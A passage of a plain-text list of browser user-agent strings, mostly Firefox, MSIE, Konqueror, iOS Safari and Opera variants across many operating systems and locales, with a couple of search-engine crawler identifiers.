Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.14) Gecko/2009090217 Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; fr-FR) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9) Gecko/2008061017 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-1.1 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.04 (jaunty) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.14) Gecko/2009090216 Ubuntu/8.04 (hardy) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.19) Gecko/2010051407 CentOS/3.0.19-1.el5.centos Firefox/3.0.19 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.3pre -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 GTB7.0 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.3) Gecko/20100403 Fedora/3.6.3-4.fc13 Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9) Gecko/2008061017 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.14) Gecko/2009090216 Ubuntu/8.04 (hardy) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092813 Gentoo Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-2.fc12 Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 (.NET CLR 3.5.30729) -Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4 -Mozilla/5.0 (X11; U; Linux x86_64; ko-KR; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; nb-NO; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.2 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9) Gecko/2008060309 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Ubuntu (hardy) Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Ubuntu/hardy Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.5) Gecko/2008121623 Ubuntu/8.10 (intrepid) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.9.1.2) Gecko/20090911 Slackware Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; pt-BR; rv:1.9b5) Gecko/2008041515 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 (.NET CLR 3.5.30729) -Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux x86_64; ru; rv:1.9.2.11) Gecko/20101028 CentOS/3.6-2.el5.centos Firefox/3.6.11 -Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 -Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8 GTB5 -Mozilla/5.0 (X11; U; Linux; en-US; rv:1.9.1.11) Gecko/20100720 Firefox/3.5.11 -Mozilla/5.0 (X11; U; Linux; fr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Mac OSX; it; rv:1.9.0.7) Gecko/2009030422 Firefox/3.0.7 -Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.9.2.12) Gecko/20101030 Firefox/3.6.12 -Mozilla/5.0 (X11; U; OpenBSD amd64; en-US; rv:1.9.0.1) Gecko/2008081402 Firefox/3.0.1 -Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 -Mozilla/5.0 (X11; U; Slackware Linux i686; en-US; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10 -Mozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5 -Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4 -Mozilla/5.0 (X11; U; SunOS i86pc; fr; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4 -Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0 -Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (X11; U; SunOS sun4u; it-IT; ) Gecko/20080000 Firefox/3.0 -Mozilla/5.0 (X11; U; Windows NT 5.0; en-US; rv:1.9b4) Gecko/2008030318 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12 -Mozilla/5.0 (X11; U; x86_64 Linux; en_US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 -Mozilla/5.0 (X11;U; Linux i686; en-GB; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5 -Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515) -Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR) -Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.2 (like Gecko) -Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.15-1.2054_FC5; X11; i686; en_US) KHTML/3.5.4 (like Gecko) -Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.16-2-k7) KHTML/3.5.0 (like Gecko) (Debian package 4:3.5.0-2bpo2) -Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Debian) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; c .NET CLR 3.0.04506; .NET CLR 3.5.30707; InfoPath.1; el-GR) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; c .NET CLR 3.0.04506; .NET CLR 3.5.30707; InfoPath.1; el-GR) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US) -Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; fr-FR) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322) -Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0 -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E) -Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) -Mozilla/5.0 (compatible; Yahoo! Slurp;http://help.yahoo.com/help/us/ysearch/slurp) -Mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html) -Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.1021.10gin_lib.cc -Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B360 Safari/531.21.10 -Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10 -Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 -Mozilla/5.0 (iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 -Mozilla/5.0 (iPhone Simulator; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7D11 Safari/531.21.10 -Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 -Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 -Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B5097d Safari/6531.22.7 -Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 -Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 -Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 -Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.60 Safari/534.30 -Mozilla/5.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Firefox/3.6.13 -Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6 -Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10 -Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc -Mozilla/6.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:2.0.0.0) Gecko/20061028 Firefox/3.0 -Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.7 -Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US) Gecko/2009032609 Chrome/2.0.172.6 Safari/530.7 -Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 -Mozilla/6.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729) -Mozilla/6.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/6.0 (Windows; U; Windows NT 7.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.9 (.NET CLR 3.5.30729) -Opera 9.4 (Windows NT 5.3; U; en) -Opera 9.4 (Windows NT 6.1; U; en) -Opera 9.7 (Windows NT 5.2; U; en) -Opera/10.50 (Windows NT 6.1; U; en-GB) Presto/2.2.2 -Opera/10.60 (Windows NT 5.1; U; en-US) Presto/2.6.30 Version/10.60 -Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60 -Opera/2.0.3920 (J2ME/MIDP; Opera Mini; en; U; ssr) -Opera/7.23 (Windows 98; U) [en] -Opera/8.0 (X11; Linux i686; U; cs) -Opera/8.00 (Windows NT 5.1; U; en) -Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr) -Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1316; fi; U; ssr) -Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4719; en; U; ssr) -Opera/8.02 (Qt embedded; Linux armv4ll; U) [en] SONY/COM1 -Opera/8.02 (Windows NT 5.1; U; en) -Opera/8.5 (X11; Linux i686; U; cs) -Opera/8.50 (Windows NT 5.1; U; en) -Opera/8.51 (Windows NT 5.1; U; en) -Opera/9.0 (Windows NT 5.0; U; en) -Opera/9.00 (Macintosh; PPC Mac OS X; U; en) -Opera/9.00 (Wii; U; ; 1038-58; Wii Shop Channel/1.0; en) -Opera/9.00 (Windows NT 5.1; U; en) -Opera/9.00 (Windows NT 5.2; U; en) -Opera/9.00 (Windows NT 6.0; U; en) -Opera/9.01 (X11; Linux i686; U; en) -Opera/9.02 (Windows NT 5.1; U; en) -Opera/9.10 (Windows NT 5.1; U; MEGAUPLOAD 1.0; pl) -Opera/9.10 (Windows NT 5.1; U; es-es) -Opera/9.10 (Windows NT 5.1; U; fi) -Opera/9.10 (Windows NT 5.1; U; hu) -Opera/9.10 (Windows NT 5.1; U; it) -Opera/9.10 (Windows NT 5.1; U; nl) -Opera/9.10 (Windows NT 5.1; U; pl) -Opera/9.10 (Windows NT 5.1; U; pt) -Opera/9.10 (Windows NT 5.1; U; sv) -Opera/9.10 (Windows NT 5.1; U; zh-tw) -Opera/9.10 (Windows NT 5.2; U; de) -Opera/9.10 (Windows NT 5.2; U; en) -Opera/9.10 (Windows NT 6.0; U; en) -Opera/9.10 (Windows NT 6.0; U; it-IT) -Opera/9.10 (X11; Linux i386; U; en) -Opera/9.10 (X11; Linux i686; U; en) -Opera/9.10 (X11; Linux i686; U; kubuntu;pl) -Opera/9.10 (X11; Linux i686; U; pl) -Opera/9.10 (X11; Linux x86_64; U; en) -Opera/9.10 (X11; Linux; U; en) -Opera/9.12 (Windows NT 5.0; U) -Opera/9.12 (Windows NT 5.0; U; ru) -Opera/9.12 (X11; Linux i686; U; en) (Ubuntu) -Opera/9.20 (Windows NT 5.1; U; MEGAUPLOAD=1.0; es-es) -Opera/9.20 (Windows NT 5.1; U; en) -Opera/9.20 (Windows NT 5.1; U; es-AR) -Opera/9.20 (Windows NT 5.1; U; es-es) -Opera/9.20 (Windows NT 5.1; U; it) -Opera/9.20 (Windows NT 5.1; U; nb) -Opera/9.20 (Windows NT 5.1; U; zh-tw) -Opera/9.20 (Windows NT 5.2; U; en) -Opera/9.20 (Windows NT 6.0; U; de) -Opera/9.20 (Windows NT 6.0; U; en) -Opera/9.20 (Windows NT 6.0; U; es-es) -Opera/9.20 (X11; Linux i586; U; en) -Opera/9.20 (X11; Linux i686; U; en) -Opera/9.20 (X11; Linux i686; U; es-es) -Opera/9.20 (X11; Linux i686; U; pl) -Opera/9.20 (X11; Linux i686; U; ru) -Opera/9.20 (X11; Linux i686; U; tr) -Opera/9.20 (X11; Linux ppc; U; en) -Opera/9.20 (X11; Linux x86_64; U; en) -Opera/9.20(Windows NT 5.1; U; en) -Opera/9.21 (Macintosh; Intel Mac OS X; U; en) -Opera/9.21 (Macintosh; PPC Mac OS X; U; en) -Opera/9.21 (Windows 98; U; en) -Opera/9.21 (Windows NT 5.0; U; de) -Opera/9.21 (Windows NT 5.1; U; MEGAUPLOAD 1.0; en) -Opera/9.21 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru) -Opera/9.21 (Windows NT 5.1; U; de) -Opera/9.21 (Windows NT 5.1; U; en) -Opera/9.21 (Windows NT 5.1; U; fr) -Opera/9.21 (Windows NT 5.1; U; nl) -Opera/9.21 (Windows NT 5.1; U; pl) -Opera/9.21 (Windows NT 5.1; U; pt-br) -Opera/9.21 (Windows NT 5.1; U; ru) -Opera/9.21 (Windows NT 5.2; U; en) -Opera/9.21 (Windows NT 6.0; U; en) -Opera/9.21 (Windows NT 6.0; U; nb) -Opera/9.21 (X11; Linux i686; U; de) -Opera/9.21 (X11; Linux i686; U; en) -Opera/9.21 (X11; Linux i686; U; es-es) -Opera/9.21 (X11; Linux x86_64; U; en) -Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru) -Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 2.0; ru) -Opera/9.22 (Windows NT 5.1; U; en) -Opera/9.22 (Windows NT 5.1; U; fr) -Opera/9.22 (Windows NT 5.1; U; pl) -Opera/9.22 (Windows NT 6.0; U; en) -Opera/9.22 (Windows NT 6.0; U; ru) -Opera/9.22 (X11; Linux i686; U; de) -Opera/9.22 (X11; Linux i686; U; en) -Opera/9.22 (X11; OpenBSD i386; U; en) -Opera/9.23 (Mac OS X; fr) -Opera/9.23 (Mac OS X; ru) -Opera/9.23 (Macintosh; Intel Mac OS X; U; ja) -Opera/9.23 (Nintendo Wii; U; ; 1038-58; Wii Internet Channel/1.0; en) -Opera/9.23 (Windows NT 5.0; U; de) -Opera/9.23 (Windows NT 5.0; U; en) -Opera/9.23 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru) -Opera/9.23 (Windows NT 5.1; U; da) -Opera/9.23 (Windows NT 5.1; U; de) -Opera/9.23 (Windows NT 5.1; U; en) -Opera/9.23 (Windows NT 5.1; U; fi) -Opera/9.23 (Windows NT 5.1; U; it) -Opera/9.23 (Windows NT 5.1; U; ja) -Opera/9.23 (Windows NT 5.1; U; pt) -Opera/9.23 (Windows NT 5.1; U; zh-cn) -Opera/9.23 (Windows NT 6.0; U; de) -Opera/9.23 (X11; Linux i686; U; en) -Opera/9.23 (X11; Linux i686; U; es-es) -Opera/9.23 (X11; Linux x86_64; U; en) -Opera/9.24 (Macintosh; PPC Mac OS X; U; en) -Opera/9.24 (Windows NT 5.0; U; ru) -Opera/9.24 (Windows NT 5.1; U; ru) -Opera/9.24 (Windows NT 5.1; U; tr) -Opera/9.24 (X11; Linux i686; U; de) -Opera/9.24 (X11; SunOS i86pc; U; en) -Opera/9.25 (Macintosh; Intel Mac OS X; U; en) -Opera/9.25 (Macintosh; PPC Mac OS X; U; en) -Opera/9.25 (OpenSolaris; U; en) -Opera/9.25 (Windows NT 4.0; U; en) -Opera/9.25 (Windows NT 5.0; U; cs) -Opera/9.25 (Windows NT 5.0; U; en) -Opera/9.25 (Windows NT 5.1; U; MEGAUPLOAD 1.0; pt-br) -Opera/9.25 (Windows NT 5.1; U; de) -Opera/9.25 (Windows NT 5.1; U; lt) -Opera/9.25 (Windows NT 5.1; U; ru) -Opera/9.25 (Windows NT 5.1; U; zh-cn) -Opera/9.25 (Windows NT 5.2; U; en) -Opera/9.25 (Windows NT 6.0; U; MEGAUPLOAD 1.0; ru) -Opera/9.25 (Windows NT 6.0; U; SV1; MEGAUPLOAD 2.0; ru) -Opera/9.25 (Windows NT 6.0; U; en-US) -Opera/9.25 (Windows NT 6.0; U; ru) -Opera/9.25 (Windows NT 6.0; U; sv) -Opera/9.25 (X11; Linux i686; U; en) -Opera/9.25 (X11; Linux i686; U; fr) -Opera/9.25 (X11; Linux i686; U; fr-ca) -Opera/9.26 (Macintosh; PPC Mac OS X; U; en) -Opera/9.26 (Windows NT 5.1; U; MEGAUPLOAD 2.0; en) -Opera/9.26 (Windows NT 5.1; U; de) -Opera/9.26 (Windows NT 5.1; U; nl) -Opera/9.26 (Windows NT 5.1; U; pl) -Opera/9.26 (Windows NT 5.1; U; zh-cn) -Opera/9.27 (Macintosh; Intel Mac OS X; U; sv) -Opera/9.27 (Windows NT 5.1; U; ja) -Opera/9.27 (Windows NT 5.2; U; en) -Opera/9.27 (X11; Linux i686; U; en) -Opera/9.27 (X11; Linux i686; U; fr) -Opera/9.30 (Nintendo Wii; U; ; 2047-7; de) -Opera/9.30 (Nintendo Wii; U; ; 2047-7; fr) -Opera/9.30 (Nintendo Wii; U; ; 2047-7;en) -Opera/9.30 (Nintendo Wii; U; ; 2047-7;es) -Opera/9.30 (Nintendo Wii; U; ; 2047-7;pt-br) -Opera/9.30 (Nintendo Wii; U; ; 2071; Wii Shop Channel/1.0; en) -Opera/9.5 (Windows NT 5.1; U; fr) -Opera/9.5 (Windows NT 6.0; U; en) -Opera/9.50 (Macintosh; Intel Mac OS X; U; de) -Opera/9.50 (Macintosh; Intel Mac OS X; U; en) -Opera/9.50 (Windows NT 5.1; U; es-ES) -Opera/9.50 (Windows NT 5.1; U; it) -Opera/9.50 (Windows NT 5.1; U; nl) -Opera/9.50 (Windows NT 5.1; U; nn) -Opera/9.50 (Windows NT 5.1; U; ru) -Opera/9.50 (Windows NT 5.2; U; it) -Opera/9.50 (X11; Linux i686; U; es-ES) -Opera/9.50 (X11; Linux ppc; U; en) -Opera/9.50 (X11; Linux x86_64; U; nb) -Opera/9.50 (X11; Linux x86_64; U; pl) -Opera/9.51 (Macintosh; Intel Mac OS X; U; en) -Opera/9.51 (Windows NT 5.1; U; da) -Opera/9.51 (Windows NT 5.1; U; en) -Opera/9.51 (Windows NT 5.1; U; en-GB) -Opera/9.51 (Windows NT 5.1; U; es-AR) -Opera/9.51 (Windows NT 5.1; U; es-LA) -Opera/9.51 (Windows NT 5.1; U; fr) -Opera/9.51 (Windows NT 5.1; U; nn) -Opera/9.51 (Windows NT 5.2; U; en) -Opera/9.51 (Windows NT 6.0; U; en) -Opera/9.51 (Windows NT 6.0; U; es) -Opera/9.51 (Windows NT 6.0; U; sv) -Opera/9.51 (X11; Linux i686; U; Linux Mint; en) -Opera/9.51 (X11; Linux i686; U; de) -Opera/9.51 (X11; Linux i686; U; fr) -Opera/9.52 (Macintosh; Intel Mac OS X; U; pt) -Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR) -Opera/9.52 (Macintosh; PPC Mac OS X; U; fr) -Opera/9.52 (Macintosh; PPC Mac OS X; U; ja) -Opera/9.52 (Windows NT 5.0; U; en) -Opera/9.52 (Windows NT 5.2; U; ru) -Opera/9.52 (Windows NT 6.0; U; Opera/9.52 (X11; Linux x86_64; U); en) -Opera/9.52 (Windows NT 6.0; U; de) -Opera/9.52 (Windows NT 6.0; U; en) -Opera/9.52 (Windows NT 6.0; U; fr) -Opera/9.52 (X11; Linux i686; U; cs) -Opera/9.52 (X11; Linux i686; U; en) -Opera/9.52 (X11; Linux i686; U; fr) -Opera/9.52 (X11; Linux ppc; U; de) -Opera/9.52 (X11; Linux x86_64; U) -Opera/9.52 (X11; Linux x86_64; U; en) -Opera/9.52 (X11; Linux x86_64; U; ru) -Opera/9.60 (Windows NT 5.0; U; en) Presto/2.1.1 -Opera/9.60 (Windows NT 5.1; U; en-GB) Presto/2.1.1 -Opera/9.60 (Windows NT 5.1; U; es-ES) Presto/2.1.1 -Opera/9.60 (Windows NT 5.1; U; sv) Presto/2.1.1 -Opera/9.60 (Windows NT 5.1; U; tr) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; bg) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; de) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; pl) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; ru) Presto/2.1.1 -Opera/9.60 (Windows NT 6.0; U; uk) Presto/2.1.1 -Opera/9.60 (X11; Linux i686; 